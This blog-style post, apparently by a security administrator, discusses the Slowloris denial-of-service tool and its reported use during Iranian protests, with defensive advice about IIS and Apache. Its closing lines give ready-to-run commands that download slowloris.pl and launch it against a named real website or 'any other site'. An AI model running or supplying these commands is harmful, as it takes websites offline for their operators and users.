The Iranian cyberwar soldiers have a problem. They can't use a general DDOS even against a specific site because that would hamper the opposition who has to get their stuff out at all time. It is the only way by which information can be distributed fast enough. So luckily (act of god ? :)) slowiris came along. This makes it possible to DDOS a site without even using more connections than an normal website visit. But the code has been opensourced and as the hackers said could be made much better.
Well you shouldn't have told that to the Iranians of which there are many geeks and computercodefreaks (and very intelligent by the way :)) So as they are now knocked off the streets and silenced in the media they can only wage their opposition online while waiting for the next opportunity to make their opposition and views known.
Meanwhile for us as security administrators it is a bit disconcerting to see a crappy code being developed into a very forcefull attack code that could be used by anyone against anything for any reason and against which there is until now not much you could do.
Yes, there is one thing : be sure to have a version of your website on IIS as backup if you site would be attacked and knocked out. It is a design failure of Sun, squid and Apache and a bunch of others that isn't present in IIS. Although take the latest versions of IIS and windows2008 and desactivate webdav and use the securitytools from Microsoft to secure and close down your site. Do not think you are smarter than Microsoft by opening up stuff or activating things you probably don't need.
You have to follow our dijgo links at our dashboard to find the references to that new attack code that you can't stop for the moment with an anti-ddos protection and that bypasses the existing protection modules for Apache.
For the moment it is becoming as simple as this (with the perl version installed)
> perl slowloris.pl -dns WEBSITE -port 80 -timeout 626 -num 2000 -tcpto 5 -httpready
and there goes your website - under the load of one machine with one adsl if you are running Apache....
and for Mac (yes it is perl so it is for any machine)
"To run slowloris.pl on Mac OS X, open Terminal and type this (hit return at the end of each line):
mkdir -p ~/Source && cd ~/Source/
curl -O http://ha.ckers.org/slowloris/slowloris.pl
chmod +x slowloris.pl
./slowloris.pl --dns www.gerdab.ir" or any other site